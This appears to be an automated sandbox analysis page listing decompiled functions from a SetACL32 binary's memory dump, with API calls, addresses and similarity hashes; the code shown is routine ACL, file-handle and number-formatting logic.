              • API ID: ConsoleErrorFileLastWrite__dosmaperr
              • String ID: @Mhv
              • API String ID: 251514795-3595611156
              • Opcode ID: 55e2fe98c59a64fabb78c74a9490ab16192c0d72b1bf0fd0348712c4b5ffbe8d
              • Instruction ID: d656e031789e7001e72754addca24158c7f6309c91554acf0a9731f2bcb37151
              • Opcode Fuzzy Hash: 55e2fe98c59a64fabb78c74a9490ab16192c0d72b1bf0fd0348712c4b5ffbe8d
              • Instruction Fuzzy Hash: 6851A071E2020BAFEF15DFA8C889BFEBBF9FF19310F440465E600AB191D67099518761
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012C2EA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
              Download Yara Rule
              C-Code - Quality: 64%
              			E012C2EA0(void* __ecx, struct _ACL* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v8;
				void* _v12;
				void _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t30;
				struct _ACL* _t40;
				void* _t41;
				void* _t42;
				void* _t49;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr* _t55;
				void* _t56;
				long _t57;
				void* _t58;
				signed int _t59;

				_t23 =  *0x1309018; // 0xedd8d3b4
				_v8 = _t23 ^ _t59;
				asm("xorps xmm0, xmm0");
				_t40 = _a4;
				_v28 = _a12;
				asm("movq [ebp-0x10], xmm0");
				_v12 = 0;
				_v24 = 0;
				_t55 = _a16;
				_v32 = _t55;
				_t51 = __ecx;
				if(_t40 == 0) {
					L9:
					_pop(_t52);
					_pop(_t56);
					_pop(_t41);
					return E012CAE19(0, _t41, _v8 ^ _t59, _t49, _t52, _t56);
				} else {
					if(GetAclInformation(_t40,  &_v20, 0xc, 2) != 0) {
						_t30 = _v20;
						 *_t55 = _t30;
						_t57 = 0;
						if(_t30 == 0) {
							goto L9;
						} else {
							while(GetAce(_t40, _t57,  &_v24) != 0) {
								if(E012BD640( *((intOrPtr*)(_t51 + 0x34)), _v24, _a8, _v28) != 0) {
									 *(_v24 + 1) =  *(_v24 + 1) | 0x00000010;
								}
								_t57 = _t57 + 1;
								if(_t57 <  *_v32) {
									continue;
								} else {
									goto L9;
								}
								goto L10;
							}
							goto L2;
						}
					} else {
						L2:
						 *((intOrPtr*)(_t51 + 0x10)) = GetLastError();
						_pop(_t53);
						_pop(_t58);
						_pop(_t42);
						return E012CAE19(0x1d, _t42, _v8 ^ _t59, _t49, _t53, _t58);
					}
				}
				L10:
			}


























              0x012c2ea6
              0x012c2ead
              0x012c2eb3
              0x012c2eb7
              0x012c2eba
              0x012c2ebd
              0x012c2ec2
              0x012c2ec9
              0x012c2ed1
              0x012c2ed4
              0x012c2ed8
              0x012c2edc
              0x012c2f54
              0x012c2f59
              0x012c2f5a
              0x012c2f5d
              0x012c2f66
              0x012c2ede
              0x012c2eef
              0x012c2f12
              0x012c2f15
              0x012c2f17
              0x012c2f1b
              0x00000000
              0x012c2f20
              0x012c2f20
              0x012c2f43
              0x012c2f48
              0x012c2f48
              0x012c2f4f
              0x012c2f52
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c2f52
              0x00000000
              0x012c2f20
              0x012c2ef1
              0x012c2ef1
              0x012c2ef7
              0x012c2eff
              0x012c2f00
              0x012c2f01
              0x012c2f0f
              0x012c2f0f
              0x012c2eef
              0x00000000

              APIs
              • GetAclInformation.ADVAPI32(00000000,EDD8D3B4,0000000C,00000002,?,?,?,?,00000000), ref: 012C2EE7
              • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 012C2EF1
              • GetAce.ADVAPI32(00000000,00000000,00000000,?,?,?,?,00000000), ref: 012C2F26
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ErrorInformationLast
              • String ID: @Mhv
              • API String ID: 3635006208-3595611156
              • Opcode ID: 31c511cdc2c9d567d567c5f139b8b4a75eef732fffdbe84c80de1ef7c8a2e40e
              • Instruction ID: 5172a94cd04c5d01efb9b701fc2e1cd5b8957bbf046be3a333142c987f5df3ed
              • Opcode Fuzzy Hash: 31c511cdc2c9d567d567c5f139b8b4a75eef732fffdbe84c80de1ef7c8a2e40e
              • Instruction Fuzzy Hash: 0E215371A0021EDBDB10DFA9D844BAFBBF8FF09710F104569EA05AB241DB719914DBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012E46DC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E012E46DC(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E012E025F(_t33) != 0xffffffff) {
					_t13 =  *0x130b340; // 0x1135708
					if(_t33 != 1 || ( *(_t13 + 0x98) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x60) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E012E025F(2);
						if(E012E025F(1) == _t21) {
							goto L1;
						}
						L7:
						if(CloseHandle(E012E025F(_t33)) != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E012E01CE(_t33);
						 *((char*)( *((intOrPtr*)(0x130b340 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x38)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E012D3E0A(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}







              0x012e46e3
              0x012e46f0
              0x012e46f6
              0x012e46fe
              0x012e470c
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012e4714
              0x012e4714
              0x012e4716
              0x012e4728
              0x00000000
              0x00000000
              0x012e472a
              0x012e473a
              0x00000000
              0x00000000
              0x012e4742
              0x012e4744
              0x012e4745
              0x012e475d
              0x012e4764
              0x00000000
              0x012e4772
              0x00000000
              0x012e476d
              0x012e46fe
              0x012e46f2
              0x012e46f2
              0x00000000

              APIs
              • CloseHandle.KERNEL32(00000000,00000000,00000010,?,012E460A,00000010,01307478,0000000C,012E46BC,?), ref: 012E4732
              • GetLastError.KERNEL32(?,012E460A,00000010,01307478,0000000C,012E46BC,?), ref: 012E473C
              • __dosmaperr.LIBCMT ref: 012E4767
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: CloseErrorHandleLast__dosmaperr
              • String ID: @Mhv
              • API String ID: 2583163307-3595611156
              • Opcode ID: 63187f3ba04063b64a1fb15ee20ec6eb645552f9a60ad19ec75d02efdc0ad3ee
              • Instruction ID: 9394a6704efeb66b5fc20d70896a98fd57e965ca409a14f43d6bfa0ff9f01eaf
              • Opcode Fuzzy Hash: 63187f3ba04063b64a1fb15ee20ec6eb645552f9a60ad19ec75d02efdc0ad3ee
              • Instruction Fuzzy Hash: A9016F327301521AD1293539A44C77E67C94F93B30FA50249FF18DB1C2DBE0C8814299
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012C9C10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
              Download Yara Rule
              C-Code - Quality: 85%
              			E012C9C10(long __ecx, void* __edx) {
				signed int _v8;
				struct _GENERIC_MAPPING _v24;
				struct _GENERIC_MAPPING _v40;
				long _v44;
				signed int _t20;
				void* _t32;
				void* _t41;
				void* _t42;
				signed int _t43;

				_t40 = __edx;
				_t20 =  *0x1309018; // 0xedd8d3b4
				_v8 = _t20 ^ _t43;
				_v44 = __ecx;
				_v24.GenericRead = 0x120089;
				_v24.GenericWrite = 0x120116;
				_v24.GenericExecute = 0x1200a0;
				_v24.GenericAll = 0x1f01ff;
				_v40.GenericRead = 0x20019;
				_v40.GenericWrite = 0x20006;
				_v40.GenericExecute = 0x20039;
				_v40.GenericAll = 0xf003f;
				if(__edx != 1) {
					if(__edx != 4) {
						return E012CAE19(__ecx, _t32, _v8 ^ _t43, __edx, _t41, _t42);
					} else {
						MapGenericMask( &_v44,  &_v40);
						return E012CAE19(_v44, _t32, _v8 ^ _t43, _t40, _t41, _t42);
					}
				} else {
					MapGenericMask( &_v44,  &_v24);
					return E012CAE19(_v44, _t32, _v8 ^ _t43, _t40, _t41, _t42);
				}
			}












              0x012c9c10
              0x012c9c16
              0x012c9c1d
              0x012c9c20
              0x012c9c23
              0x012c9c2a
              0x012c9c31
              0x012c9c38
              0x012c9c3f
              0x012c9c46
              0x012c9c4d
              0x012c9c54
              0x012c9c5e
              0x012c9c82
              0x012c9cb2
              0x012c9c84
              0x012c9c8c
              0x012c9ca2
              0x012c9ca2
              0x012c9c60
              0x012c9c68
              0x012c9c7e
              0x012c9c7e

              APIs
              • MapGenericMask.ADVAPI32(?,00120089), ref: 012C9C68
              • MapGenericMask.ADVAPI32(?,00020019), ref: 012C9C8C
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: GenericMask
              • String ID: 9$?
              • API String ID: 3675760450-2473970582
              • Opcode ID: 0e4cf03001e897010eb7ecfc2695c9df1e8c34c96c2ba4d2fb2fd4e35d952f4f
              • Instruction ID: c1cc1e55cd68a416aecf3d6223dc26d6e568ae280e42beaf79f598a9d44914e6
              • Opcode Fuzzy Hash: 0e4cf03001e897010eb7ecfc2695c9df1e8c34c96c2ba4d2fb2fd4e35d952f4f
              • Instruction Fuzzy Hash: FD110D70E0021CDB8F05DFD5E6945EEBBF8EB0C314F50025EDA05B7201DB755A548B94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012E4004 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON
              Download Yara Rule
              C-Code - Quality: 90%
              			E012E4004(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
				signed int _v8;
				void* _v12;
				void* _t15;
				int _t16;
				signed int _t19;
				intOrPtr _t28;
				signed int _t32;
				signed int _t33;
				signed int _t36;
				signed int _t39;

				_t36 = _a4;
				_push(_t32);
				_t15 = E012E025F(_t36);
				_t33 = _t32 | 0xffffffff;
				_t41 = _t15 - _t33;
				if(_t15 != _t33) {
					_push(_a16);
					_t16 = SetFilePointerEx(_t15, _a8, _a12,  &_v12);
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = (_v12 & _v8) - _t33;
						if((_v12 & _v8) == _t33) {
							goto L2;
						} else {
							_t19 = _v12;
							_t39 = (_t36 & 0x0000003f) * 0x38;
							_t28 =  *((intOrPtr*)(0x130b340 + (_t36 >> 6) * 4));
							_t11 = _t28 + _t39 + 0x28;
							 *_t11 =  *(_t28 + _t39 + 0x28) & 0x000000fd;
							__eflags =  *_t11;
						}
					} else {
						E012D3E0A(GetLastError());
						goto L2;
					}
				} else {
					 *((intOrPtr*)(E012D3E40(_t41))) = 9;
					L2:
					_t19 = _t33;
				}
				return _t19;
			}













              0x012e400c
              0x012e400f
              0x012e4011
              0x012e4016
              0x012e401a
              0x012e401c
              0x012e402f
              0x012e403d
              0x012e4043
              0x012e4045
              0x012e405e
              0x012e4060
              0x00000000
              0x012e4062
              0x012e4062
              0x012e406d
              0x012e4070
              0x012e4077
              0x012e4077
              0x012e4077
              0x012e4077
              0x012e4047
              0x012e404e
              0x00000000
              0x012e4053
              0x012e401e
              0x012e4023
              0x012e4029
              0x012e4029
              0x012e402b
              0x012e407f

              APIs
              • SetFilePointerEx.KERNEL32(00000000,00000010,00000002,00000000,00000000,00000010,00000000,?,?,?,012E40B1,00000000,00000010,00000002,00000000), ref: 012E403D
              • GetLastError.KERNEL32(?,012E40B1,00000000,00000010,00000002,00000000,?,012E1855,00000000,00000000,00000000,00000002,00000010,00000000,00000000), ref: 012E4047
              • __dosmaperr.LIBCMT ref: 012E404E
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ErrorFileLastPointer__dosmaperr
              • String ID: @Mhv
              • API String ID: 2336955059-3595611156
              • Opcode ID: 4fc8978616260a914a42b4c2bdc110a57996b6a7a618185e643a6a3cf788a6a6
              • Instruction ID: 1b1902886c8938e646a43e081cbf990c34e9c64c5c27b50541993a4fac7fc716
              • Opcode Fuzzy Hash: 4fc8978616260a914a42b4c2bdc110a57996b6a7a618185e643a6a3cf788a6a6
              • Instruction Fuzzy Hash: 39014C32720159AFCB19EFA9EC09CBE3FA9EF85230B240215F915DB1C1E671DD418761
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012DB3E1 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
              Download Yara Rule
              C-Code - Quality: 79%
              			E012DB3E1(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v32;
				signed int _v40;
				char _v48;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				signed char _t85;
				void* _t91;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				void* _t119;
				signed int* _t120;
				void* _t123;
				signed int _t125;
				signed int _t131;
				signed int* _t132;
				signed int* _t135;
				signed int _t136;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t148;
				signed int _t149;
				signed int _t153;
				signed int _t154;
				void* _t158;
				unsigned int _t159;
				signed int _t166;
				void* _t167;
				signed int _t168;
				signed int* _t169;
				signed int _t172;
				signed int _t180;
				signed int _t181;
				signed int _t182;
				signed int _t184;
				signed int _t185;
				signed int _t186;

				_t167 = __edx;
				_t180 = _a24;
				if(_t180 < 0) {
					_t180 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E012D14C0( &_v60, _t167, _a36);
				_t5 = _t180 + 0xb; // 0xb
				_t192 = _a12 - _t5;
				if(_a12 > _t5) {
					_t135 = _a4;
					_t141 = _t135[1];
					_t168 =  *_t135;
					__eflags = (_t141 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t141 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						__eflags = _t141;
						if(__eflags > 0) {
							L14:
							_t17 = _t184 + 1; // 0x12d2470
							_t169 = _t17;
							_t85 = _a28 ^ 0x00000001;
							_v20 = 0x3ff;
							_v5 = _t85;
							_v40 = _t169;
							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
							__eflags = _t141 & 0x7ff00000;
							_t91 = 0x30;
							if((_t141 & 0x7ff00000) != 0) {
								 *_t184 = 0x31;
								L19:
								_t143 = 0;
								__eflags = 0;
								L20:
								_t25 =  &(_t169[0]); // 0x12d2470
								_t185 = _t25;
								_v16 = _t185;
								__eflags = _t180;
								if(_t180 != 0) {
									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
								} else {
									_t95 = _t143;
								}
								 *_t169 = _t95;
								_t97 = _t135[1] & 0x000fffff;
								__eflags = _t97;
								_v24 = _t97;
								if(_t97 > 0) {
									L25:
									_t170 = _t143;
									_t144 = 0xf0000;
									_t98 = 0x30;
									_v12 = _t98;
									_v16 = _t143;
									_v24 = 0xf0000;
									do {
										__eflags = _t180;
										if(_t180 <= 0) {
											break;
										}
										_t123 = E012E5E90( *_t135 & _t170, _v12, _t135[1] & _t144 & 0x000fffff);
										_t158 = 0x30;
										_t125 = _t123 + _t158 & 0x0000ffff;
										__eflags = _t125 - 0x39;
										if(_t125 > 0x39) {
											_t125 = _t125 + _v32;
											__eflags = _t125;
										}
										_t159 = _v24;
										_t170 = (_t159 << 0x00000020 | _v16) >> 4;
										 *_t185 = _t125;
										_t185 = _t185 + 1;
										_t144 = _t159 >> 4;
										_t98 = _v12 - 4;
										_t180 = _t180 - 1;
										_v16 = (_t159 << 0x00000020 | _v16) >> 4;
										_v24 = _t159 >> 4;
										_v12 = _t98;
										__eflags = _t98;
									} while (_t98 >= 0);
									_v16 = _t185;
									__eflags = _t98;
									if(_t98 < 0) {
										goto L42;
									}
									_t119 = E012E5E90( *_t135 & _t170, _v12, _t135[1] & _t144 & 0x000fffff);
									__eflags = _t119 - 8;
									if(_t119 <= 8) {
										goto L42;
									}
									_t50 = _t185 - 1; // 0x12d2470
									_t120 = _t50;
									_t139 = 0x30;
									while(1) {
										_t153 =  *_t120;
										__eflags = _t153 - 0x66;
										if(_t153 == 0x66) {
											goto L35;
										}
										__eflags = _t153 - 0x46;
										if(_t153 != 0x46) {
											_t135 = _a4;
											__eflags = _t120 - _v40;
											if(_t120 == _v40) {
												_t54 = _t120 - 1;
												 *_t54 =  *(_t120 - 1) + 1;
												__eflags =  *_t54;
											} else {
												__eflags = _t153 - 0x39;
												if(_t153 != 0x39) {
													_t154 = _t153 + 1;
													__eflags = _t154;
												} else {
													_t154 = _v32 + 0x3a;
												}
												 *_t120 = _t154;
											}
											goto L42;
										}
										L35:
										 *_t120 = _t139;
										_t120 = _t120 - 1;
									}
								} else {
									__eflags =  *_t135 - _t143;
									if( *_t135 <= _t143) {
										L42:
										__eflags = _t180;
										if(_t180 > 0) {
											_push(_t180);
											_t115 = 0x30;
											_push(_t115);
											_push(_t185);
											E012CCDE0(_t180);
											_t185 = _t185 + _t180;
											__eflags = _t185;
											_v16 = _t185;
										}
										_t99 = _v40;
										__eflags =  *_t99;
										if( *_t99 == 0) {
											_t185 = _t99;
											_v16 = _t185;
										}
										 *_t185 = (_v5 << 5) + 0x50;
										_t104 = E012E5E90( *_t135, 0x34, _t135[1]);
										_t186 = 0;
										_t105 = _v16;
										_t148 = (_t104 & 0x000007ff) - _v20;
										__eflags = _t148;
										asm("sbb esi, esi");
										_t63 = _t105 + 2; // 0x12d2470
										_t172 = _t63;
										_v40 = _t172;
										if(__eflags < 0) {
											L50:
											_t148 =  ~_t148;
											asm("adc esi, 0x0");
											_t186 =  ~_t186;
											_t136 = 0x2d;
											goto L51;
										} else {
											if(__eflags > 0) {
												L49:
												_t136 = 0x2b;
												L51:
												 *(_t105 + 1) = _t136;
												_t181 = _t172;
												_t106 = 0x30;
												 *_t172 = _t106;
												_t107 = 0;
												__eflags = _t186;
												if(__eflags < 0) {
													L55:
													__eflags = _t181 - _t172;
													if(_t181 != _t172) {
														L59:
														_push(_t136);
														_push(_t107);
														_push(0x64);
														_push(_t186);
														_t108 = E012E5EB0();
														_t186 = _t136;
														_t136 = _t148;
														_v32 = _t172;
														_t172 = _v40;
														 *_t181 = _t108 + 0x30;
														_t181 = _t181 + 1;
														_t107 = 0;
														__eflags = 0;
														L60:
														__eflags = _t181 - _t172;
														if(_t181 != _t172) {
															L64:
															_push(_t136);
															_push(_t107);
															_push(0xa);
															_push(_t186);
															_push(_t148);
															_t110 = E012E5EB0();
															_v40 = _t172;
															 *_t181 = _t110 + 0x30;
															_t181 = _t181 + 1;
															_t107 = 0;
															__eflags = 0;
															L65:
															_t149 = _t148 + 0x30;
															__eflags = _t149;
															 *_t181 = _t149;
															 *(_t181 + 1) = _t107;
															_t182 = _t107;
															L66:
															if(_v48 != 0) {
																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
															}
															return _t182;
														}
														__eflags = _t186 - _t107;
														if(__eflags < 0) {
															goto L65;
														}
														if(__eflags > 0) {
															goto L64;
														}
														__eflags = _t148 - 0xa;
														if(_t148 < 0xa) {
															goto L65;
														}
														goto L64;
													}
													__eflags = _t186 - _t107;
													if(__eflags < 0) {
														goto L60;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t148 - 0x64;
													if(_t148 < 0x64) {
														goto L60;
													}
													goto L59;
												}
												_t136 = 0x3e8;
												if(__eflags > 0) {
													L54:
													_push(_t136);
													_push(_t107);
													_push(_t136);
													_push(_t186);
													_t113 = E012E5EB0();
													_t186 = _t136;
													_t136 = _t148;
													_v32 = _t172;
													_t172 = _v40;
													 *_t172 = _t113 + 0x30;
													_t181 = _t172 + 1;
													_t107 = 0;
													__eflags = 0;
													goto L55;
												}
												__eflags = _t148 - 0x3e8;
												if(_t148 < 0x3e8) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t148;
											if(_t148 < 0) {
												goto L50;
											}
											goto L49;
										}
									}
									goto L25;
								}
							}
							 *_t184 = _t91;
							_t143 =  *_t135 | _t135[1] & 0x000fffff;
							__eflags = _t143;
							if(_t143 != 0) {
								_v20 = 0x3fe;
								goto L19;
							}
							_v20 = _t143;
							goto L20;
						}
						if(__eflags < 0) {
							L13:
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
							_t141 = _t135[1];
							goto L14;
						}
						__eflags = _t168;
						if(_t168 >= 0) {
							goto L14;
						}
						goto L13;
					}
					_t182 = E012DB6FA(_t135, _t141, _t135, _t184, _a12, _a16, _a20, _t180, 0, _a32, 0);
					__eflags = _t182;
					if(_t182 == 0) {
						_t131 = E012E60F0(_t184, 0x65);
						__eflags = _t131;
						if(_t131 != 0) {
							_t166 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							__eflags = _t166;
							 *_t131 = _t166;
							 *((char*)(_t131 + 3)) = 0;
						}
						_t182 = 0;
					} else {
						 *_t184 = 0;
					}
					goto L66;
				}
				_t132 = E012D3E40(_t192);
				_t182 = 0x22;
				 *_t132 = _t182;
				E012CF34F();
				goto L66;
			}

























































              0x012db3e1
              0x012db3ec
              0x012db3f1
              0x012db3f3
              0x012db3f3
              0x012db3f7
              0x012db400
              0x012db402
              0x012db407
              0x012db40a
              0x012db40d
              0x012db423
              0x012db426
              0x012db42b
              0x012db435
              0x012db43a
              0x012db48e
              0x012db490
              0x012db49f
              0x012db4a2
              0x012db4a2
              0x012db4a5
              0x012db4a7
              0x012db4ae
              0x012db4c0
              0x012db4c3
              0x012db4c8
              0x012db4cc
              0x012db4cd
              0x012db4ed
              0x012db4f0
              0x012db4f0
              0x012db4f0
              0x012db4f2
              0x012db4f2
              0x012db4f2
              0x012db4f5
              0x012db4f8
              0x012db4fa
              0x012db50b
              0x012db4fc
              0x012db4fc
              0x012db4fc
              0x012db50d
              0x012db512
              0x012db512
              0x012db517
              0x012db51a
              0x012db524
              0x012db526
              0x012db528
              0x012db52d
              0x012db52e
              0x012db531
              0x012db534
              0x012db537
              0x012db537
              0x012db539
              0x00000000
              0x00000000
              0x012db550
              0x012db557
              0x012db55b
              0x012db55e
              0x012db561
              0x012db563
              0x012db563
              0x012db563
              0x012db569
              0x012db56c
              0x012db570
              0x012db572
              0x012db576
              0x012db579
              0x012db57c
              0x012db57d
              0x012db580
              0x012db583
              0x012db586
              0x012db586
              0x012db58b
              0x012db58e
              0x012db591
              0x00000000
              0x00000000
              0x012db5a8
              0x012db5ad
              0x012db5b1
              0x00000000
              0x00000000
              0x012db5b5
              0x012db5b5
              0x012db5b8
              0x012db5b9
              0x012db5b9
              0x012db5bb
              0x012db5be
              0x00000000
              0x00000000
              0x012db5c0
              0x012db5c3
              0x012db5ca
              0x012db5cd
              0x012db5d0
              0x012db5e5
              0x012db5e5
              0x012db5e5
              0x012db5d2
              0x012db5d2
              0x012db5d5
              0x012db5df
              0x012db5df
              0x012db5d7
              0x012db5da
              0x012db5da
              0x012db5e1
              0x012db5e1
              0x00000000
              0x012db5d0
              0x012db5c5
              0x012db5c5
              0x012db5c7
              0x012db5c7
              0x012db51c
              0x012db51c
              0x012db51e
              0x012db5e8
              0x012db5e8
              0x012db5ea
              0x012db5ec
              0x012db5ef
              0x012db5f0
              0x012db5f1
              0x012db5f2
              0x012db5fa
              0x012db5fa
              0x012db5fc
              0x012db5fc
              0x012db5ff
              0x012db602
              0x012db605
              0x012db607
              0x012db609
              0x012db609
              0x012db616
              0x012db61d
              0x012db624
              0x012db626
              0x012db62f
              0x012db62f
              0x012db632
              0x012db634
              0x012db634
              0x012db637
              0x012db63a
              0x012db646
              0x012db646
              0x012db64a
              0x012db64d
              0x012db64f
              0x00000000
              0x012db63c
              0x012db63c
              0x012db642
              0x012db642
              0x012db650
              0x012db650
              0x012db653
              0x012db657
              0x012db658
              0x012db65a
              0x012db65c
              0x012db65e
              0x012db688
              0x012db688
              0x012db68a
              0x012db697
              0x012db697
              0x012db698
              0x012db699
              0x012db69b
              0x012db69d
              0x012db6a2
              0x012db6a4
              0x012db6a8
              0x012db6ab
              0x012db6ae
              0x012db6b0
              0x012db6b1
              0x012db6b1
              0x012db6b3
              0x012db6b3
              0x012db6b5
              0x012db6c2
              0x012db6c2
              0x012db6c3
              0x012db6c4
              0x012db6c6
              0x012db6c7
              0x012db6c8
              0x012db6d1
              0x012db6d4
              0x012db6d6
              0x012db6d7
              0x012db6d7
              0x012db6d9
              0x012db6d9
              0x012db6d9
              0x012db6dc
              0x012db6de
              0x012db6e1
              0x012db6e3
              0x012db6e9
              0x012db6ee
              0x012db6ee
              0x012db6f9
              0x012db6f9
              0x012db6b7
              0x012db6b9
              0x00000000
              0x00000000
              0x012db6bb
              0x00000000
              0x00000000
              0x012db6bd
              0x012db6c0
              0x00000000
              0x00000000
              0x00000000
              0x012db6c0
              0x012db68c
              0x012db68e
              0x00000000
              0x00000000
              0x012db690
              0x00000000
              0x00000000
              0x012db692
              0x012db695
              0x00000000
              0x00000000
              0x00000000
              0x012db695
              0x012db660
              0x012db665
              0x012db66b
              0x012db66b
              0x012db66c
              0x012db66d
              0x012db66e
              0x012db670
              0x012db675
              0x012db677
              0x012db679
              0x012db67e
              0x012db681
              0x012db683
              0x012db686
              0x012db686
              0x00000000
              0x012db686
              0x012db667
              0x012db669
              0x00000000
              0x00000000
              0x00000000
              0x012db669
              0x012db63e
              0x012db640
              0x00000000
              0x00000000
              0x00000000
              0x012db640
              0x012db63a
              0x00000000
              0x012db51e
              0x012db51a
              0x012db4cf
              0x012db4db
              0x012db4db
              0x012db4dd
              0x012db4e4
              0x00000000
              0x012db4e4
              0x012db4df
              0x00000000
              0x012db4df
              0x012db492
              0x012db498
              0x012db498
              0x012db49b
              0x012db49b
              0x012db49c
              0x00000000
              0x012db49c
              0x012db494
              0x012db496
              0x00000000
              0x00000000
              0x00000000
              0x012db496
              0x012db454
              0x012db459
              0x012db45b
              0x012db468
              0x012db46f
              0x012db471
              0x012db47c
              0x012db47c
              0x012db47f
              0x012db481
              0x012db481
              0x012db485
              0x012db45d
              0x012db45d
              0x012db45d
              0x00000000
              0x012db45b
              0x012db40f
              0x012db416
              0x012db417
              0x012db419
              0x00000000

              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: _strrchr
              • String ID:
              • API String ID: 3213747228-0
